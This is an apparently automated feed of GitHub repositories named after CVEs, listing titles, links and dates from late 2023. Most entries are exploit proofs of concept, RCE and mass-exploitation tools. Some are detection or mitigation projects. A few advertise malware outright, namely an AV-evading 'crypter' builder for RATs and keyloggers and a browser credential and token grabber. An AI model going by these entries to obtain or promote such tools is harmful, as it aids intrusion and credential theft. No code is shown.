**no description** : [uthrasri/CVE-2014-5139](https://github.com/uthrasri/CVE-2014-5139) create time: 2023-11-07T17:53:51Z

**no description** : [uthrasri/CVE-2014-3570_G2.5_openssl_no_patch](https://github.com/uthrasri/CVE-2014-3570_G2.5_openssl_no_patch) create time: 2023-11-07T17:29:28Z

**no description** : [uthrasri/CVE-2014-3570](https://github.com/uthrasri/CVE-2014-3570) create time: 2023-11-07T15:19:36Z

**Password recovery easySoft and easyE4 (CVE-2023-43776 and CVE-2023-43777)** : [SySS-Research/easy-password-recovery](https://github.com/SySS-Research/easy-password-recovery) create time: 2023-11-07T07:44:13Z

**no description** : [uthrasri/Openssl_G2.5_CVE-2014-3570_01](https://github.com/uthrasri/Openssl_G2.5_CVE-2014-3570_01) create time: 2023-11-07T14:33:31Z

**no description** : [uthrasri/openssl_G2.5_CVE-2014-3570](https://github.com/uthrasri/openssl_G2.5_CVE-2014-3570) create time: 2023-11-07T13:04:45Z

**no description** : [uthrasri/openssl_g2.5_CVE-2014-3566](https://github.com/uthrasri/openssl_g2.5_CVE-2014-3566) create time: 2023-11-07T10:57:31Z

**A POC written in Python to exploit CVE 2018-9276.** : [mmezirard/cve-2018-9276](https://github.com/mmezirard/cve-2018-9276) create time: 2023-11-07T09:31:33Z

**no description** : [uthrasri/CVE-2014-8275_openssl_g2.5](https://github.com/uthrasri/CVE-2014-8275_openssl_g2.5) create time: 2023-11-07T07:07:46Z

**no description** : [uthrasri/Openssl_G2.5_CVE-2014-8275](https://github.com/uthrasri/Openssl_G2.5_CVE-2014-8275) create time: 2023-11-07T06:42:34Z

**no description** : [Trinadh465/OpenSSL-1_0_1g_CVE-2015-3197](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-3197) create time: 2023-11-07T06:25:41Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_CVE-2016-0798](https://github.com/nidhi7598/OPENSSL_1.0.1g_CVE-2016-0798) create time: 2023-11-07T05:11:01Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_CVE-2016-0797](https://github.com/nidhi7598/OPENSSL_1.0.1g_CVE-2016-0797) create time: 2023-11-07T04:45:53Z

**no description** : [s4m98/winrar-cve-2023-38831-poc-gen](https://github.com/s4m98/winrar-cve-2023-38831-poc-gen) create time: 2023-11-07T04:14:04Z

**Metabase Pre-Auth RCE POC** : [Mrunalkaran/CVE-2023-38646](https://github.com/Mrunalkaran/CVE-2023-38646) create time: 2023-11-07T03:57:15Z

**个人挖掘出来的漏洞CVE-2021-43503** : [guoyanan1g/Laravel-vul](https://github.com/guoyanan1g/Laravel-vul) create time: 2021-11-05T09:59:34Z

**Bitrix24 Remote Command Execution (RCE) via Unsafe Variable Extraction** : [ForceFledgling/CVE-2023-1714](https://github.com/ForceFledgling/CVE-2023-1714) create time: 2023-11-06T23:41:36Z

**Bitrix24 Remote Command Execution (RCE) via Insecure Temporary File Creation** : [ForceFledgling/CVE-2023-1713](https://github.com/ForceFledgling/CVE-2023-1713) create time: 2023-11-06T23:35:44Z

**Proof of Concept Exploit for CVE-2021-43609** : [d5sec/CVE-2021-43609-POC](https://github.com/d5sec/CVE-2021-43609-POC) create time: 2023-11-06T21:13:21Z

**Automated bulk IP scanner Cisco ASA and FTD XSS** : [imhunterand/CVE-2020-3580](https://github.com/imhunterand/CVE-2020-3580) create time: 2023-11-06T17:46:56Z

**detecting cve 2019 8942 based on signature based detection.** : [nguyenmanhthinbsl/CVE2019_8942](https://github.com/nguyenmanhthinbsl/CVE2019_8942) create time: 2023-11-06T16:43:37Z

**no description** : [Trinadh465/OpenSSL-1_0_1g_CVE-2015-1792](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-1792) create time: 2023-11-06T14:06:32Z

**no description** : [Trinadh465/OpenSSL-1_0_1g_CVE-2015-1790](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-1790) create time: 2023-11-06T11:20:35Z

**no description** : [d4rkb0n3/CVE-2022-24715-go](https://github.com/d4rkb0n3/CVE-2022-24715-go) create time: 2023-11-06T09:44:33Z

**no description** : [Trinadh465/OpenSSL-1_0_1g_CVE-2015-3195](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-3195) create time: 2023-11-06T09:00:14Z

**no description** : [Trinadh465/OpenSSL-1_0_1g_CVE-2015-3194](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2015-3194) create time: 2023-11-06T08:49:31Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_CVE-2016-2178](https://github.com/nidhi7598/OPENSSL_1.0.1g_CVE-2016-2178) create time: 2023-11-06T05:41:41Z

**no description** : [sule01u/CVE-2023-46604](https://github.com/sule01u/CVE-2023-46604) create time: 2023-11-06T04:05:51Z

**CVE-2018-25031 Test PoC** : [wrkk112/CVE-2018-25031](https://github.com/wrkk112/CVE-2018-25031) create time: 2023-11-06T02:26:03Z

**In this repository you will find the technical report of Nibbles, the exploit to abuse the CVE-2015-6967 and an autopwn tool in case you want to resolve the machine in HackTheBox** : [3mpir3Albert/HTB_Nibbles](https://github.com/3mpir3Albert/HTB_Nibbles) create time: 2023-11-05T22:26:48Z

**The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.** : [Pushkarup/CVE-2023-5360](https://github.com/Pushkarup/CVE-2023-5360) create time: 2023-11-05T18:02:59Z

**no description** : [ayushx007/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/ayushx007/CVE-2022-0847-DirtyPipe-Exploits) create time: 2023-11-05T15:34:54Z

**Android Kernel Vulnerability (CVE-2019-2215) temporary root PoC** : [jsirichai/CVE-2019-2215](https://github.com/jsirichai/CVE-2019-2215) create time: 2023-11-05T14:32:11Z

**no description** : [prodigiousMind/CVE-2023-41425](https://github.com/prodigiousMind/CVE-2023-41425) create time: 2023-11-05T15:06:43Z

**no description** : [jsirichai/CVE-2019-2215](https://github.com/jsirichai/CVE-2019-2215) create time: 2023-11-05T14:06:11Z

**no description** : [MojithaR/CVE-2023-30190-FOLLINA](https://github.com/MojithaR/CVE-2023-30190-FOLLINA) create time: 2023-11-05T13:36:07Z

**no description** : [MojithaR/CVE-2023-30190-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-30190-EXPLOIT.py) create time: 2023-11-05T12:39:14Z

**Exploit for CVE-2023-37903** : [7h3h4ckv157/CVE-2023-37903](https://github.com/7h3h4ckv157/CVE-2023-37903) create time: 2023-11-05T11:23:15Z

**An Exploitation tool to exploit the confluence server that are vulnerable to CVE-2023-22518 Improper Authorization** : [sanjai-AK47/CVE-2023-22518](https://github.com/sanjai-AK47/CVE-2023-22518) create time: 2023-11-05T06:45:33Z

**HTTP/2 RAPID RESET** : [sigridou/CVE-2023-44487](https://github.com/sigridou/CVE-2023-44487) create time: 2023-11-04T22:34:23Z

**no description** : [Evan-Zhangyf/CVE-2023-45158](https://github.com/Evan-Zhangyf/CVE-2023-45158) create time: 2023-11-04T21:14:09Z

**no description** : [Evan-Zhangyf/CVE-2023-45158](https://github.com/Evan-Zhangyf/CVE-2023-45158) create time: 2023-11-04T21:10:29Z

**A POC written in Python to exploit CVE 2007-2447.** : [mmezirard/cve-2007-2447](https://github.com/mmezirard/cve-2007-2447) create time: 2023-11-04T18:34:12Z

**CVE-2023-42470** : [actuator/imou](https://github.com/actuator/imou) create time: 2023-08-17T02:12:24Z

**An eBPF program to detect attacks on CVE-2022-0847** : [h4ckm310n/CVE-2022-0847-eBPF](https://github.com/h4ckm310n/CVE-2022-0847-eBPF) create time: 2023-07-06T01:31:01Z

**This script demonstrates a time-based blind SQL injection on Moodle platforms, exploiting response delays to extract data.** : [T0X1Cx/CVE-2021-36393-Exploit](https://github.com/T0X1Cx/CVE-2021-36393-Exploit) create time: 2023-11-04T11:45:55Z

**no description** : [evkl1d/CVE-2023-46604](https://github.com/evkl1d/CVE-2023-46604) create time: 2023-11-04T11:58:21Z

**This is an exploit file which is used to check CVE-2021-21716 vulnerability** : [MojithaR/CVE-2023-21716-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-21716-EXPLOIT.py) create time: 2023-11-04T08:49:14Z

**Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)** : [SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ) create time: 2023-11-03T22:06:09Z

**no description** : [1337nemojj/CVE-2023-28121](https://github.com/1337nemojj/CVE-2023-28121) create time: 2023-11-03T22:02:11Z

**no description** : [nicolastsk/cve-2018-10993](https://github.com/nicolastsk/cve-2018-10993) create time: 2023-11-03T20:22:16Z

**no description** : [XalfiE/CVE-2023-20178_](https://github.com/XalfiE/CVE-2023-20178_) create time: 2023-07-26T05:21:13Z

**no description** : [li-minhao/CVE-2023-37478-Demo](https://github.com/li-minhao/CVE-2023-37478-Demo) create time: 2023-11-03T18:26:52Z

**Unlimited Build Files Unlimited Spread Files Small File size Compatible with RATs, Keyloggers, Botnets, or any other exe Best Results on AV 0/35 Easy to use Exploit Builder** : [FireMachiness/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/FireMachiness/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-11-03T17:35:08Z

**no description** : [AlexanderZinoni/CVE-2022-21449](https://github.com/AlexanderZinoni/CVE-2022-21449) create time: 2022-09-04T11:56:58Z

**An Exploitation script developed to exploit the CVE-2023-46747 which Pre Auth Remote Code Execution of f5-BIG Ip producs** : [sanjai-AK47/CVE-2023-46747](https://github.com/sanjai-AK47/CVE-2023-46747) create time: 2023-11-03T13:31:11Z

**CVE-2023-46604** : [JaneMandy/ActiveMQ_RCE_Pro_Max](https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max) create time: 2023-10-27T12:22:43Z

**An Exploitation script developed to exploit the CVE-2023-20198 Cisco zero day vulnerability on their IOS routers** : [sanjai-AK47/CVE-2023-20198](https://github.com/sanjai-AK47/CVE-2023-20198) create time: 2023-11-03T13:05:59Z

**WooODT Lite <= 2.4.6 - Missing Authorization to Arbitrary Options Update (Subscriber+)** : [RandomRobbieBF/CVE-2023-47179](https://github.com/RandomRobbieBF/CVE-2023-47179) create time: 2023-11-03T09:39:30Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_CVE-2016-2176](https://github.com/nidhi7598/OPENSSL_1.0.1g_CVE-2016-2176) create time: 2023-11-03T09:15:10Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_CVE-2016-2109](https://github.com/nidhi7598/OPENSSL_1.0.1g_CVE-2016-2109) create time: 2023-11-03T09:03:55Z

**A crappy exploit script written for CVE-2023-38646. It works about as well as peace treaties between Israel and Hamas.** : [Itrekr/CVE-2023-38646-Crapsploit](https://github.com/Itrekr/CVE-2023-38646-Crapsploit) create time: 2023-11-03T08:19:01Z

**no description** : [pazhanivel07/OpenSSL_1_0_1g_CVE-2015-1788](https://github.com/pazhanivel07/OpenSSL_1_0_1g_CVE-2015-1788) create time: 2023-11-03T06:22:42Z

**no description** : [fdevsectest/CVE-2023-4966](https://github.com/fdevsectest/CVE-2023-4966) create time: 2023-11-03T05:59:14Z

**Python 2.7** : [Jenderal92/WP-CVE-2023-28121](https://github.com/Jenderal92/WP-CVE-2023-28121) create time: 2023-11-03T01:19:09Z

**Python 2.7** : [Jenderal92/WP-CVE-2023-5360](https://github.com/Jenderal92/WP-CVE-2023-5360) create time: 2023-11-03T00:58:36Z

**Checker for CVE-2023-22518 vulnerability on Confluence** : [davidfortytwo/CVE-2023-22518](https://github.com/davidfortytwo/CVE-2023-22518) create time: 2023-11-02T22:52:15Z

**no description** : [vinetsuicide/CVE-2023-2640-CVE-2023-32629](https://github.com/vinetsuicide/CVE-2023-2640-CVE-2023-32629) create time: 2023-11-02T20:19:57Z

**Exploit for the unauthenticated file upload vulnerability in WordPress's Royal Elementor Addons and Templates plugin (< 1.3.79). CVE-ID: CVE-2023-5360.** : [tucommenceapousser/CVE-2023-5360](https://github.com/tucommenceapousser/CVE-2023-5360) create time: 2023-11-02T03:28:59Z

**no description** : [NestyF/CVE-2018-15473](https://github.com/NestyF/CVE-2018-15473) create time: 2023-11-02T16:30:52Z

**POC** : [yte121/CVE-2023-46974](https://github.com/yte121/CVE-2023-46974) create time: 2023-11-02T16:08:19Z

**no description** : [sajaljat/CVE-2023-46980](https://github.com/sajaljat/CVE-2023-46980) create time: 2023-11-02T16:05:23Z

**no description** : [nvansluis/test_cve-2023-46747](https://github.com/nvansluis/test_cve-2023-46747) create time: 2023-11-02T16:03:35Z

**no description** : [jakedmurphy1/CVE-2023-46954](https://github.com/jakedmurphy1/CVE-2023-46954) create time: 2023-11-02T13:09:52Z

**no description** : [uthrasri/CVE-2021-28165](https://github.com/uthrasri/CVE-2021-28165) create time: 2023-11-02T11:08:06Z

**CVE-2018-7854** : [yanissec/CVE-2018-7854](https://github.com/yanissec/CVE-2018-7854) create time: 2023-11-02T07:47:38Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_CVE-2010-5298](https://github.com/nidhi7598/OPENSSL_1.0.1g_CVE-2010-5298) create time: 2023-11-02T05:56:32Z

**no description** : [Satheesh575555/OpensSSL_1.0.1g_CVE-2014-3470](https://github.com/Satheesh575555/OpensSSL_1.0.1g_CVE-2014-3470) create time: 2023-11-02T05:35:28Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_CVE-2014-0224](https://github.com/nidhi7598/OPENSSL_1.0.1g_CVE-2014-0224) create time: 2023-11-02T05:34:13Z

**Exploit for the unauthenticated file upload vulnerability in WordPress's Royal Elementor Addons and Templates plugin (< 1.3.79). CVE-ID: CVE-2023-5360.** : [Chocapikk/CVE-2023-5360](https://github.com/Chocapikk/CVE-2023-5360) create time: 2023-11-02T03:15:44Z

**ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具, 基于 Go 语言** : [X1r0z/ActiveMQ-RCE](https://github.com/X1r0z/ActiveMQ-RCE) create time: 2023-10-27T05:57:21Z

**CVE-2023-46747 (F5 BIG-IP) RCE** : [bijaysenihang/CVE-2023-46747-Mass-RCE](https://github.com/bijaysenihang/CVE-2023-46747-Mass-RCE) create time: 2023-11-01T07:05:18Z

**no description** : [soy-oreocato/CVE-2023-46998](https://github.com/soy-oreocato/CVE-2023-46998) create time: 2023-11-01T19:36:38Z

**Exploit Title:  WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - "Dashboard Redirect" field  Stored Cross-Site Scripting (XSS)** : [rach1tarora/CVE-2023-47184](https://github.com/rach1tarora/CVE-2023-47184) create time: 2023-11-01T19:19:36Z

**no description** : [y4v4z/CVE-2023-46747-POC](https://github.com/y4v4z/CVE-2023-46747-POC) create time: 2023-11-01T16:28:28Z

**A simple bash script that exploits CVE-2021-22205 against vulnerable instances of gitlab** : [NukingDragons/gitlab-cve-2021-22205](https://github.com/NukingDragons/gitlab-cve-2021-22205) create time: 2023-11-01T15:19:01Z

**no description** : [maniak-academy/Mitigate-CVE-2023-46747](https://github.com/maniak-academy/Mitigate-CVE-2023-46747) create time: 2023-11-01T14:57:20Z

**CVE-2023-46747 Criticle Auth Bypass** : [fu2x2000/CVE-2023-46747](https://github.com/fu2x2000/CVE-2023-46747) create time: 2023-11-01T13:16:13Z

**no description** : [nidhi7598/jetty-9.4.31_CVE-2023-26049](https://github.com/nidhi7598/jetty-9.4.31_CVE-2023-26049) create time: 2023-11-01T09:55:19Z

**no description** : [Trinadh465/jetty_9.4.31_CVE-2021-34428](https://github.com/Trinadh465/jetty_9.4.31_CVE-2021-34428) create time: 2023-11-01T10:15:36Z

**exploit for cve-2023-46747** : [W01fh4cker/CVE-2023-46747-RCE](https://github.com/W01fh4cker/CVE-2023-46747-RCE) create time: 2023-11-01T09:31:05Z

**SideCopy APT Group exploits CVE-2023-38831** : [seyit-sigirci/SideCopy-Exploits-CVE-2023-38831](https://github.com/seyit-sigirci/SideCopy-Exploits-CVE-2023-38831) create time: 2023-11-01T08:57:15Z

**no description** : [Trinadh465/jetty_9.4.31_CVE-2020-27216](https://github.com/Trinadh465/jetty_9.4.31_CVE-2020-27216) create time: 2023-11-01T06:57:10Z

**no description** : [abdullah098/CVE_2020_0796](https://github.com/abdullah098/CVE_2020_0796) create time: 2023-11-01T06:47:06Z

**jetty /CVE-2021-28164/분석 및 결과** : [jammy0903/-jettyCVE-2021-28164-](https://github.com/jammy0903/-jettyCVE-2021-28164-) create time: 2023-10-31T14:59:29Z

**no description** : [khcujw/CVE-2020-9802](https://github.com/khcujw/CVE-2020-9802) create time: 2023-10-31T14:05:32Z

**BoltWire v6.03 vulnerable to "Improper Access Control"** : [Cyber-Wo0dy/CVE-2023-46501](https://github.com/Cyber-Wo0dy/CVE-2023-46501) create time: 2023-10-31T12:40:14Z

**no description** : [4xolotl/CVE-2018-15473](https://github.com/4xolotl/CVE-2018-15473) create time: 2023-10-31T11:23:34Z

**no description** : [Trinadh465/jetty_9.4.31_CVE-2022-2048](https://github.com/Trinadh465/jetty_9.4.31_CVE-2022-2048) create time: 2023-10-31T11:32:00Z

**Improper Authorization Vulnerability in Confluence Data Center and Server** : [tonghuaroot/CVE-2023-22518](https://github.com/tonghuaroot/CVE-2023-22518) create time: 2023-10-31T12:30:42Z

**no description** : [nidhi7598/jetty-9.4.31_CVE-2020-27216](https://github.com/nidhi7598/jetty-9.4.31_CVE-2020-27216) create time: 2023-10-31T10:35:45Z

**no description** : [Trinadh465/jetty_9.4.31_CVE-2021-28169](https://github.com/Trinadh465/jetty_9.4.31_CVE-2021-28169) create time: 2023-10-31T10:46:23Z

**no description** : [nidhi7598/jetty-9.4.31_CVE-2021-28165](https://github.com/nidhi7598/jetty-9.4.31_CVE-2021-28165) create time: 2023-10-31T10:39:28Z

**no description** : [Trinadh465/jetty_9.4.31_CVE-2023-26049](https://github.com/Trinadh465/jetty_9.4.31_CVE-2023-26049) create time: 2023-10-31T10:53:27Z

**Image horizontal reel scroll slideshow <= 13.2 - Authenticated (Subscriber+) SQL Injection via Shortcode** : [RandomRobbieBF/CVE-2023-5412](https://github.com/RandomRobbieBF/CVE-2023-5412) create time: 2023-10-31T09:26:21Z

**EXPLOIT FOR CVE-2014-6271** : [0xN7y/CVE-2014-6271](https://github.com/0xN7y/CVE-2014-6271) create time: 2023-10-31T06:48:30Z

**Improper Authorization Vulnerability in Confluence Data Center and Server** : [ForceFledgling/CVE-2023-22518](https://github.com/ForceFledgling/CVE-2023-22518) create time: 2023-10-31T05:35:00Z

**no description** : [quantiano/cve-2023-47103.github.io](https://github.com/quantiano/cve-2023-47103.github.io) create time: 2023-10-31T04:03:02Z

**CVE-2018-20377; 20575; 20576; 20577 Multiple security vulnerabilities affecting latest firmware release on ORANGE Livebox modems.** : [zadewg/LIVEBOX-0DAY](https://github.com/zadewg/LIVEBOX-0DAY) create time: 2018-10-27T18:13:42Z

**CVE-2020-20093; 20094; 20095; 20096, 2022-28345 RTLO Injection URI Spoofing** : [zadewg/RIUS](https://github.com/zadewg/RIUS) create time: 2019-08-15T18:22:18Z

**no description** : [codeb0ss/CVE-2023-5843-PoC](https://github.com/codeb0ss/CVE-2023-5843-PoC) create time: 2023-10-31T02:13:06Z

**no description** : [48484848484848/Jmeter-CVE-2018-1297-](https://github.com/48484848484848/Jmeter-CVE-2018-1297-) create time: 2023-10-30T20:41:55Z

**no description** : [vlrhsgody/-vlrhsgody-RocketChat-CVE-2021-22911-](https://github.com/vlrhsgody/-vlrhsgody-RocketChat-CVE-2021-22911-) create time: 2023-10-30T15:09:37Z

**Funciona pra explorar o CVE-2007-6750 (vulnerabilidade ao DoS de slowloris)** : [Jeanpseven/slowl0ris](https://github.com/Jeanpseven/slowl0ris) create time: 2023-10-30T16:50:13Z

**longitudes de código para desencadenar esta vulnerabilidad** : [MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064](https://github.com/MrR0b0t19/vulnerabilidad-LibWebP-CVE-2023-41064) create time: 2023-10-30T17:03:24Z

**F5 BIG-IP unauthenticated remote code execution (RCE) and authentication bypass vulnerability!** : [AliBrTab/CVE-2023-46747-POC](https://github.com/AliBrTab/CVE-2023-46747-POC) create time: 2023-10-30T15:50:46Z

**Joomla Unauthorized Access Vulnerability** : [cybernetwiz/CVE-2023-23752](https://github.com/cybernetwiz/CVE-2023-23752) create time: 2023-10-30T14:54:56Z

**CVE-2023-46747 (F5 BIG-IP) RCE** : [k0zulzr/CVE-2023-46747-Mass-RCE](https://github.com/k0zulzr/CVE-2023-46747-Mass-RCE) create time: 2023-10-30T13:25:45Z

**metasploit module for CVE-2023-46747 (F5 BIG-IP) RCE and the analyze** : [TomArn1/CVE-2023-46747-PoC](https://github.com/TomArn1/CVE-2023-46747-PoC) create time: 2023-10-30T13:08:47Z

**no description** : [mr-xmen786/CVE-2023-46478](https://github.com/mr-xmen786/CVE-2023-46478) create time: 2023-10-30T11:28:43Z

**no description** : [nidhi7598/OPENSSL_1.0.1g_G2.5_CVE-2022-0778](https://github.com/nidhi7598/OPENSSL_1.0.1g_G2.5_CVE-2022-0778) create time: 2023-10-30T09:52:21Z

**CVE-2018-7852** : [yanissec/CVE-2018-7852](https://github.com/yanissec/CVE-2018-7852) create time: 2023-10-30T08:41:38Z

**no description** : [halkichi0308/CVE-2021-22880](https://github.com/halkichi0308/CVE-2021-22880) create time: 2023-10-30T08:30:12Z

**PoC CVE-2023-5044** : [r0binak/CVE-2023-5044](https://github.com/r0binak/CVE-2023-5044) create time: 2023-10-30T07:59:11Z

**a Proof of Concept of cve-2021-43226,stack overflow in Windows driver clfs.sys** : [Rosayxy/cve-2021-43226PoC](https://github.com/Rosayxy/cve-2021-43226PoC) create time: 2023-10-30T06:47:50Z

**Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks) Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords)** : [StarlinkCoinn/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/StarlinkCoinn/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-10-30T03:17:46Z

**Unlimited Build Files Unlimited Spread Files Small File size Compatible with RATs, Keyloggers, Botnets, or any other exe Best Results on AV 0/35 Easy to use Exploit Builder** : [StarlinkCoinn/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/StarlinkCoinn/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-10-30T03:12:50Z

**no description** : [won6c/CVE-2021-22205](https://github.com/won6c/CVE-2021-22205) create time: 2023-10-29T13:13:41Z

**CVE-2023-27524** : [NguyenCongHaiNam/Research-CVE-2023-27524](https://github.com/NguyenCongHaiNam/Research-CVE-2023-27524) create time: 2023-10-30T00:27:20Z

**CVE-2023-22515** : [AIex-3/confluence-hack](https://github.com/AIex-3/confluence-hack) create time: 2023-10-30T00:17:45Z

**Demonstration of CVE-2022-31692 authorization bypass in Spring Security** : [hotblac/cve-2022-31692](https://github.com/hotblac/cve-2022-31692) create time: 2023-10-29T17:31:23Z

**An Exploitation script developed to exploit the CVE-2023-4966 bleed citrix information disclosure vulnerability** : [sanjai-AK47/CVE-2023-4966](https://github.com/sanjai-AK47/CVE-2023-4966) create time: 2023-10-29T15:31:37Z

**CVE-2009-3103 ms09-050** : [sec13b/ms09-050_CVE-2009-3103](https://github.com/sec13b/ms09-050_CVE-2009-3103) create time: 2023-10-29T05:25:29Z

**no description** : [ijh4723/-zeroboo-Gohead-CVE-2021-42342-1](https://github.com/ijh4723/-zeroboo-Gohead-CVE-2021-42342-1) create time: 2023-10-29T05:50:47Z

**This is a POC for CVE-2022-22963** : [BearClaw96/CVE-2022-22963-Poc-Bearcules](https://github.com/BearClaw96/CVE-2022-22963-Poc-Bearcules) create time: 2023-10-28T21:42:38Z

**Proof of concept for CVE-2023-4911(Looney Tunables) discovered by Qualys Threat Research Unit** : [Diego-AltF4/CVE-2023-4911](https://github.com/Diego-AltF4/CVE-2023-4911) create time: 2023-10-28T20:05:30Z

**no description** : [ayhan-dev/CVE-2023-391](https://github.com/ayhan-dev/CVE-2023-391) create time: 2023-10-28T17:39:36Z

**no description** : [nhuynhuy/cve-2017-11882](https://github.com/nhuynhuy/cve-2017-11882) create time: 2023-10-28T13:15:45Z

**Parse citrix netscaler logs to check for signs of CVE-2023-4966 exploitation** : [certat/citrix-logchecker](https://github.com/certat/citrix-logchecker) create time: 2023-10-28T11:44:42Z

**no description** : [Saboor-Hakimi-23/CVE-2021-21300](https://github.com/Saboor-Hakimi-23/CVE-2021-21300) create time: 2023-10-28T10:17:45Z

**detect bruteforce using for cve-2021-34527** : [TieuLong21Prosper/detect_bruteforce](https://github.com/TieuLong21Prosper/detect_bruteforce) create time: 2023-10-28T08:16:36Z

**CVE-2023-33246 - Apache RocketMQ config RCE** : [0xKayala/CVE-2023-33246](https://github.com/0xKayala/CVE-2023-33246) create time: 2023-10-28T07:08:19Z

**CVE-2023-29552 - Service Location Protocol Vulnerability** : [0xKayala/CVE-2023-29552](https://github.com/0xKayala/CVE-2023-29552) create time: 2023-10-27T09:17:21Z

**CVE-2023-4966 - NetScaler ADC and NetScaler Gateway Memory Leak Exploit** : [0xKayala/CVE-2023-4966](https://github.com/0xKayala/CVE-2023-4966) create time: 2023-10-27T11:00:09Z

**Stack-Overflow on Citrix** : [Mohammaddvd/CVE-2023-3519](https://github.com/Mohammaddvd/CVE-2023-3519) create time: 2023-10-27T18:39:31Z

**no description** : [r4pG0r/CVE-2023-46747-POC](https://github.com/r4pG0r/CVE-2023-46747-POC) create time: 2023-10-27T18:16:08Z

**no description** : [xorverbin/-xorverbin-nacos-CVE-2021-29441-](https://github.com/xorverbin/-xorverbin-nacos-CVE-2021-29441-) create time: 2023-10-27T11:55:14Z

**no description** : [MosaedH/CVE-2022-32548-RCE-POC](https://github.com/MosaedH/CVE-2022-32548-RCE-POC) create time: 2023-10-27T08:58:11Z

**CVE-2023-22515** : [C1ph3rX13/CVE-2023-22515](https://github.com/C1ph3rX13/CVE-2023-22515) create time: 2023-10-27T07:20:35Z

**no description** : [codeb0ss/CVE-2023-5815-PoC](https://github.com/codeb0ss/CVE-2023-5815-PoC) create time: 2023-10-26T22:50:26Z

**Cisco IOS XE implant scanning & detection (CVE-2023-20198, CVE-2023-20273)** : [fox-it/cisco-ios-xe-implant-detection](https://github.com/fox-it/cisco-ios-xe-implant-detection) create time: 2023-10-23T14:52:18Z

**no description** : [e180175/CVE-2019-1663-vuln](https://github.com/e180175/CVE-2019-1663-vuln) create time: 2023-10-26T15:08:52Z

**no description** : [katseyres2/CVE-2021-43798](https://github.com/katseyres2/CVE-2021-43798) create time: 2023-10-26T14:21:49Z

**PoC and Writeup for CVE-2023-46404.** : [windecks/CVE-2023-46404](https://github.com/windecks/CVE-2023-46404) create time: 2023-10-26T15:01:32Z

**no description** : [ReToCode/golang-CVE-2023-44487](https://github.com/ReToCode/golang-CVE-2023-44487) create time: 2023-10-25T09:11:46Z

**no description** : [uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097) create time: 2023-10-26T13:44:13Z

**no description** : [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955) create time: 2023-10-26T13:19:06Z

**no description** : [sajaljat/CVE-2023-46451](https://github.com/sajaljat/CVE-2023-46451) create time: 2023-10-26T12:34:03Z

**CVE-2023-46450 reference** : [yte121/-CVE-2023-46450](https://github.com/yte121/-CVE-2023-46450) create time: 2023-10-26T12:30:21Z

**no description** : [sajaljat/CVE-2023-46449](https://github.com/sajaljat/CVE-2023-46449) create time: 2023-10-26T12:03:29Z

**Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.** : [junnythemarksman/CVE-2023-38646](https://github.com/junnythemarksman/CVE-2023-38646) create time: 2023-10-26T10:37:23Z

**Ansible Playbook for CVE-2023-4966** : [ditekshen/ansible-cve-2023-4966](https://github.com/ditekshen/ansible-cve-2023-4966) create time: 2023-10-26T09:32:48Z

**This script exploits CVE-2023-23397, a Zero-Day vulnerability in Microsoft Outlook, allowing the generation of malicious emails for testing and educational purposes.** : [Pushkarup/CVE-2023-23397](https://github.com/Pushkarup/CVE-2023-23397) create time: 2023-10-26T09:26:32Z

**CVE-2023-5360** : [nastar-id/CVE-2023-5360](https://github.com/nastar-id/CVE-2023-5360) create time: 2023-10-26T08:18:43Z

**no description** : [phankz/Worpress-CVE-2023-5360](https://github.com/phankz/Worpress-CVE-2023-5360) create time: 2023-10-26T06:56:48Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097) create time: 2023-10-26T06:46:14Z

**no description** : [jeongjunsoo/CVE-2022-0778](https://github.com/jeongjunsoo/CVE-2022-0778) create time: 2023-10-26T04:39:44Z

**CVE-2023-45857の挙動を確認するデモ** : [intercept6/CVE-2023-45857-Demo](https://github.com/intercept6/CVE-2023-45857-Demo) create time: 2023-10-26T04:18:03Z

**CVE-2018-7849** : [yanissec/CVE-2018-7849](https://github.com/yanissec/CVE-2018-7849) create time: 2023-10-26T02:50:25Z

